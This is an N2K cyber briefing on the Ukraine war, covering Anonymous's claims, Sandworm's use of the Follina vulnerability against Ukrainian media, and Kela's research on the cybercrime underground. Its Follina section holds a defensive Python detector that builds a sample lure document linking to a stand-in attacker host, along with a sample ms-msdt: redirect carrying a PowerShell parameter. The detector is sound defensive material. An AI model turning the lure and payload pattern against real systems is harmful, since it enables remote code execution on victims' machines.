Ukraine at D+110: Hacktivists, spies, and cyber criminals.
N2K, Jun 14, 2022

Supplying an artillery war, as Russia seeks to conquer rubble. Anonymous makes some large claims about its actions against Russia and Belarus. GRU's Sandworm exploits the Follina vulnerability against Ukrainian media organizations. Ukraine is backing up sensitive data abroad. And a study released this morning looks at the challenges and opportunities Russia's war has presented the cyber criminal underworld.


Russia continues to expend ammunition at a prodigious rate in the Donbas, which has emerged as the decisive theater of the war. Task & Purpose claims 60,000 shells and rockets are being expended daily, which is a great deal, although not an unprecedented bombardment by 20th-century standards. Retired US General David Petraeus characterized the tactics to Task & Purpose: “When they confront a particularly determined and skillful urban defense, they pound it with artillery, rockets, missiles, and bombs until it is totally destroyed and ‘depopulated.’ They then secure the rubble and move forward until they encounter further determined defenders and repeat the process. This is, of course, why the Ukrainians have described this phase of the war as heavily artillery-centric — and why it is so important that the U.S. and other western countries expeditiously provide as much artillery, ammunition, drones, loitering munitions, counterfire radars, multiple-launch rocket systems and rockets, and other relevant capabilities (including trucks to carry the ammo) as the Ukrainians can possibly absorb and employ.”

Newsweek summarizes the materiel Ukraine has requested from sympathetic countries: "1,000 howitzers caliber 155 mm, 300 MLRS (M270 Multiple Launch Rocket System), 500 tanks, 2,000 armored vehicles, and 1,000 drones."

This morning's situation report from the UK's Ministry of Defence (MoD) notes the continuing Russian concentration on Sieverodonetsk, but focuses on the challenges of industrial mobilization for a long war. "Russia's operational main effort remains the assault against the Sieverodonetsk pocket in the Donbas and its Western Group of forces have likely made small advances in the Kharkiv sector for the first time in several weeks. On 10 June, the First Deputy Chairman of Russia's Military Industrial Commission predicted that state defence spending will increase by 600-700 billion roubles (GBP 8.5-10 billion), which could approach a 20% increase in Russia's defence budget. Russian government funding is allowing the country's defence industrial base to be slowly mobilised to meet demands placed on it by the war in Ukraine. However, the industry could struggle to meet many of these requirements, partially due to the effects of sanctions and lack of expertise. Russia's production of high-quality optics and advanced electronics likely remain troubled and could undermine its efforts to replace equipment lost in Ukraine."

Anonymous claims to have hacked Russia's drone suppliers...

Anonymous claims to have successfully hacked into Russia's drone suppliers, if not exactly the drones themselves. "Russian UAV drones plans and tactic's hacked. We hope this information will help the war to end as soon as possible , no war is justified! [sic]" tweeted @Spid3r, who claims adherence to the hacktivist collective. Accounts of exactly what Anonymous obtained are confused and unclear, but it does not appear to have been a "direct attack on the Russian military," as some sources said. Images @Spid3r posted of files allegedly stolen appear to include promotional literature and a list of companies involved in the production or trade of the Kronstadt Group's Orion-E armed drone, an export model. Computing notes, sensibly, that "The nature of Anonymous makes it impossible to ascertain if the hacked data is genuine, although cybersecurity experts do think that most of the collective claims of successful attacks are true."

...and to have hit sensitive targets in Belarus.

@Spid3r also claims to have engineered significant disruption of government activities in Belarus. "Access to 26 ministries, centers and banks of the Belarusian Government has been restricted as a result of attacks by me (@YourAnonSpider)" the hacktivist crowed on Twitter. There are no independent reports of such activity, and the claim should be received with skepticism: somebody would surely have noticed disturbances that widespread.

Ukraine moves sensitive data abroad.

The Wall Street Journal reports that Ukraine has begun to store sensitive data abroad, backing up its information to render it less vulnerable to Russian physical or cyber attack. George Dubinskiy, the country's deputy minister of digital transformation, said, “To be on the safe side, we want to have our backups abroad.” Among the earlier transfers was a program to back data up to a secure private cloud with servers located in Poland. Priority has been given to protecting "VIP" databases, that is, databases deemed essential to the operation of Ukraine's economy.

Dealing with the GRU's exploitation of the Follina vulnerability.

CERT-UA maintains its conclusion that Sandworm, a GRU operation, was responsible for exploiting Follina to compromise Ukrainian media organizations, Computing reports. Compromised Word documents are carrying the AsyncRAT Trojan as a malicious payload.

Follina is a remote code execution vulnerability (CVE-2022-30190, rated 7.8 out of 10 by Microsoft) in the Microsoft Support Diagnostic Tool (MSDT). A malicious Office document loads a remote HTML page through an external object link; that page invokes the ms-msdt: URL protocol handler, and MSDT runs the PowerShell supplied in the URL's parameters, with no macro needed. It's being called "low-interaction remote code execution" rather than zero-click because some interaction is required, but not much: opening the document is enough, and for the RTF variant merely previewing the file in Windows Explorer suffices. Ars Technica notes that Microsoft has issued mitigation guidance explaining how to disable the MSDT URL protocol handler, but hasn't yet said whether it will issue a full patch for the issue.
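The two artifacts that distinguish a Follina lure from an ordinary document are the external OLE object relationship inside the .docx archive and the ms-msdt: redirect in the page that relationship fetches. The scanner below checks for both. It is an added example, not code from CERT-UA, Microsoft, or any of the sources cited here; the sample document and second-stage HTML it builds are constructed for illustration, and the hostnames and the diagnostic-pack arguments in them are assumptions, not indicators taken from the Sandworm campaign.

```python
"""Detect the Follina (CVE-2022-30190) delivery chain in a .docx and in its
second-stage HTML. Added example, not code from CERT-UA, Microsoft or the
page's sources. A Follina document carries an external OLE object relationship
in word/_rels/document.xml.rels pointing at an attacker web page; that page
redirects to an ms-msdt: URL, and MSDT runs the PowerShell embedded in its
parameters. Both stages are checked here against constructed samples (the
hostnames and the diagnostic-pack arguments are illustrative assumptions)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL = REL_BASE + "oleObject"
HYPERLINK_REL = REL_BASE + "hyperlink"
# Relationship kinds that make Word fetch and render remote content on open.
# Plain hyperlinks are external too but only fire when clicked, so they are
# listed by external_rels() but not treated as Follina indicators.
RISKY_REL_KINDS = {"oleObject", "frame"}
MSDT_URI_RE = re.compile(r"ms-msdt:[^\"'<\r\n]*", re.IGNORECASE)


def external_rels(docx_bytes):
    """List (rels file, Id, kind, Target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(PKG_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel.get("Id"), kind, rel.get("Target")))
    return found


def follina_rels(docx_bytes):
    """Only the external relationships of the kinds Follina abuses."""
    return [r for r in external_rels(docx_bytes) if r[2] in RISKY_REL_KINDS]


def msdt_uris(html):
    """ms-msdt: URIs found in fetched second-stage HTML (the part MSDT executes)."""
    return MSDT_URI_RE.findall(html)


def scan(docx_bytes, fetched_html=None):
    """Verdict for one document, optionally with the HTML its external link resolved to."""
    rels = follina_rels(docx_bytes)
    uris = msdt_uris(fetched_html) if fetched_html else []
    return {"external_ole": rels, "msdt_uris": uris, "follina": bool(rels) or bool(uris)}


def build_sample_docx(target, rel_type=OLE_REL):
    """Constructed minimal .docx whose document.xml.rels carries one external relationship."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{REL_BASE}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{rel_type}" Target="{target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed second-stage page: the redirect into the ms-msdt: handler that the
# document's external link resolves to (payload is illustrative, not a real one).
SAMPLE_HTML = (
    "<html><body><script>"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    '/param IT_BrowseForFile=$(calc)";'
    "</script></body></html>"
)

if __name__ == "__main__":
    malicious = build_sample_docx("http://attacker.invalid/stage2.html")
    benign = build_sample_docx("https://example.invalid/", HYPERLINK_REL)
    print(scan(malicious, SAMPLE_HTML))  # follina: True
    print(scan(benign))                  # follina: False, hyperlink ignored
```

Point `scan()` at the bytes of a real attachment and, if the external target was retrieved in a sandbox, at the HTML it returned. Until a patch is applied, Microsoft's published workaround is to remove the protocol handler after backing it up (`reg export HKCR\ms-msdt msdt-backup.reg`, then `reg delete HKCR\ms-msdt /f`), which makes the second stage fail even when a user opens or previews the lure.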

The war's effects on the cyber underworld.

Kela Cybercrime Intelligence has researched the effect Russia’s war against Ukraine has been having on the cybercrime landscape, detailing new developments in the cybercriminal underground as a result of the conflict. The effects are being produced by new criminal opportunities, by the effect of Western sanctions, and by new Russian restrictions on certain online services.

Kela researchers have found, for example, that people are getting transportation out of Ukraine through hacking sites rather than through legitimate sites and services, and there has been an increase in demand for money transfer services, as both Russia and Ukraine now have laws in place dictating limits on the amounts that can be transferred and the locations to which money may be transferred. These are the services black markets have traditionally offered in wartime, and cyber criminals have not been slow to pivot from online fraud and carding to taking advantage of the desperate.

What’s made legitimate remittances harder has also made criminal transactions more difficult. The blind eye the Russian organs have traditionally turned toward money laundering, for example, is now seeing a bit more clearly, and life has grown a bit more challenging for the underworld. And, of course, Western sanctions have made it difficult, in some cases difficult to the point of impossibility, for, say, ransomware victims to pay their extortionists, especially when the ransomware operators are working from Russia, as so many of them do.

VPN services have also seen a “spike” in demand. “The spike can be caused by the arrival of new users hoping to acquire accounts for reliable VPN services,” Kela writes, “especially since Russia has started to block URLs linked to some of them, while to legally pay for remaining VPNs is hard without having non-Russia issued Visa and MasterCard credit cards.” There’s nothing inherently illegal about VPNs, but they’re restricted in Russia, where the government has enacted censorship laws to stifle access to sites that offer what the Kremlin regards as “disinformation,” that is, comment and reporting that don’t reflect the official Russian line on the special military operation. Facebook and Instagram are among the platforms being censored, and the cyber underworld has been quick to offer illicit VPN services to those who want to see the news the government would rather go unreported (or at least unheard).

Kela has also found that the war is affecting both cybercriminal online communities and C2C (criminal-to-criminal) markets for ransomware and other crimeware. The actors behind the Raccoon Stealer malware reported on a forum that their core developers are unable to continue to produce the malware because of a “special operation” and that work on Raccoon Stealer has been suspended. The gang hints that the suspension is due to the war. Chatter about the effects of the war has also appeared on Russophone cybercrime forums. There’s some debate there about the nature and justification of Russia’s war, despite the forums’ rules against such political discussion. And, of course, as we’ve seen, ransomware gangs have taken sides in the war, usually Russia’s side. (Conti is the most famous of these.) Some of the gangs, wishing for freedom to pursue criminal gain, have sought to keep operations as normal as possible by declaring their neutrality.